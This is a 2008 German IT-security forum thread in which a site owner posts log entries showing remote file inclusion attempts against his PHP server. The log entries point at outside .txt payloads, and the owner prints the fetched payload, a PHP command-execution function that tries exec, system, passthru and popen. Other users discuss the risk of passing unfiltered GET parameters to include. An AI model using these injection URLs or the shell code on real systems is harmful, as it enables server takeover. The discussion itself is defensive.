php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > IT-Security Forum > IT-Security
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


IT-Security Alles rund um IT-Security aus den Bereichen Hard- und Software

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 01-07-2008, 22:44
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard Hacker ?!

schaut euch mal diese referer an.
Da will doch jemand meinen Server übernehmen!

/index.php?prefix=http://www.vanderjagt-kraanverhuur.nl/id.txt?
/errors.php?error=http://fuckyou.fileave.com/alb.txt??
Mit Zitat antworten
  #2 (permalink)  
Alt 01-07-2008, 22:48
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Und jetzt?
Mit Zitat antworten
  #3 (permalink)  
Alt 01-07-2008, 23:17
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

nix!

ich finde es nur sehr spannend
Mit Zitat antworten
  #4 (permalink)  
Alt 01-07-2008, 23:22
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Ich finds eher gähnend langweilig. Hat er denn wenigstens Erfolg gehabt. Dann kann man dich wenigstens darauf hinweisen, deine Lücken zu stopfen, statt uns hier mit deinen Trivialitäten zu nerven.
Mit Zitat antworten
  #5 (permalink)  
Alt 02-07-2008, 09:50
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

tut mir leid









Ich finde es trotzdem spannend
Mit Zitat antworten
  #6 (permalink)  
Alt 02-07-2008, 10:05
UzumakiNaruto
 Registrierter Benutzer
Links : Onlinestatus : UzumakiNaruto ist offline
Registriert seit: Nov 2004
Beiträge: 642
UzumakiNaruto befindet sich auf einem aufstrebenden Ast
Standard

ich würde mal eher behaupten dort will jemand links in deine datenbank schreiben
__________________
Gruß
Uzu

private Homepage
Mit Zitat antworten
  #7 (permalink)  
Alt 02-07-2008, 10:44
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Der will Befehle auf dem Server ausführen

PHP-Code:
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo 
$eseguicmd;
function 
ex($cfe){
$res '';
if (!empty(
$cfe)){
if(
function_exists('exec')){
@
exec($cfe,$res);
$res join("\n",$res);
}
elseif(
function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(
function_exists('system')){
@
ob_start();
@
system($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(
function_exists('passthru')){
@
ob_start();
@
passthru($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(@
is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@
feof($f)) { $res .= @fread($f,1024); }
@
pclose($f);
}}
return 
$res;
}
exit; 
Mit Zitat antworten
  #8 (permalink)  
Alt 02-07-2008, 13:33
Flip7
 Registrierter Benutzer
Links : Onlinestatus : Flip7 ist offline
Registriert seit: May 2007
Ort: Munich
Beiträge: 126
Flip7 ist zur Zeit noch ein unbeschriebenes Blatt
Flip7 eine Nachricht über ICQ schicken
Standard

Auf http://fuckyou.fileave.com/ würden Spamer schöne Adressen finden :-D

und die niederländische Seite da verkauft oder vermietet Bagger :-D

komische Leute, aber @dunixphp JA das sind Hackerangriffe, jedoch irgendwie harmlose...

Ist aber ganz lustig alles zu überwachen, gell
__________________
Find Parties?
Partysuche
Mit Zitat antworten
  #9 (permalink)  
Alt 02-07-2008, 15:51
Benutzerbild von onemorenerd onemorenerd
  Moderator
Links : Onlinestatus : onemorenerd ist offline
Registriert seit: Mar 2005
Ort: Berlin
Beiträge: 9.471
onemorenerd wird schon bald berühmt werdenonemorenerd wird schon bald berühmt werden
Standard

Als harmlos würde ich das nicht bezeichnen. Die Art des Angriffs mag banal sein, aber wenn es klappt, hat man eine PHP-Shell mit der man ziemlichen Schaden anrichten kann. Die Erfolgschancen für den Angreifer dürften nicht schlecht stehen, wenn man bedenkt wieviele Leute hier immer wieder ungefiltert GET-Parameter für include nutzen.
Mit Zitat antworten
  #10 (permalink)  
Alt 02-07-2008, 16:10
h3ll
 Registrierter Benutzer
Links : Onlinestatus : h3ll ist offline
Registriert seit: Mar 2008
Beiträge: 3.807
h3ll befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Original geschrieben von onemorenerd
Als harmlos würde ich das nicht bezeichnen. Die Art des Angriffs mag banal sein, aber wenn es klappt, hat man eine PHP-Shell mit der man ziemlichen Schaden anrichten kann. Die Erfolgschancen für den Angreifer dürften nicht schlecht stehen, wenn man bedenkt wieviele Leute hier immer wieder ungefiltert GET-Parameter für include nutzen.
Was meiner Meinung nach genauso fahrlässig ist wie ein Auto mit geöffneten Fenstern abzustellen und darin den Zündschlüssel stecken zu lassen.
Mit Zitat antworten
  #11 (permalink)  
Alt 02-07-2008, 16:17
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Wobei in dem Fall nur der Besitzer des Autos den Schaden hat. Unter einer gekaperten Kiste leiden im Zweifelsfall wesentlich mehr Menschen.
Mit Zitat antworten
  #12 (permalink)  
Alt 02-07-2008, 18:13
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

harmlos mit Sicherheit nicht!
*Lehrgeld bereits bezahlt*
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

Projektmanagement Damals und Heute
Projektmanagement Damals und HeuteWerfen Sie einen Blick auf das, was sich verändert hat, und entdecken Sie, wo die Zukunft dieses Gebietes hinsteuert.

18.01.2021 | Berni

Arbeitsmanagement-Tools
Arbeitsmanagement-ToolsWarum jedes Team Arbeitsmanagement-Tools benötigt. Man schätzt, dass 25% eines durchschnittlichen Mitarbeiter-Tages durch ineffiziente Arbeit vergeudet werden.

11.12.2020 | Berni


 

Aktuelle PHP Scripte

Simple Forum PHP ansehen Simple Forum PHP

If you need simple forum or discussion on your website, then you've come to the right place. Simple Forum PHP is a script that is very easy to install and administer.

28.08.2021 nevenov | Kategorie: PHP/ Forum PHP Software
Formmailer Bootstrap 4

Mit dem Formmailer kann man sich eMails über seine Seite zukommen lassen.

08.07.2021 arne-home | Kategorie: PHP/ Formular
Fehlerseite Bootstrap 4

Bei Aufruf einer nicht existierenden Seite, teilen Sie Besuchern mit einer eigenen Fehlerseite mit, dass die gewünschte Seite nicht gefunden wurde. Die eigene Fehlerseite sollte dasselbe Design wie die Website haben. Zudem sollte ein Link zur Startseite a

04.07.2021 arne-home | Kategorie: PHP/ Counter
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 12:14 Uhr.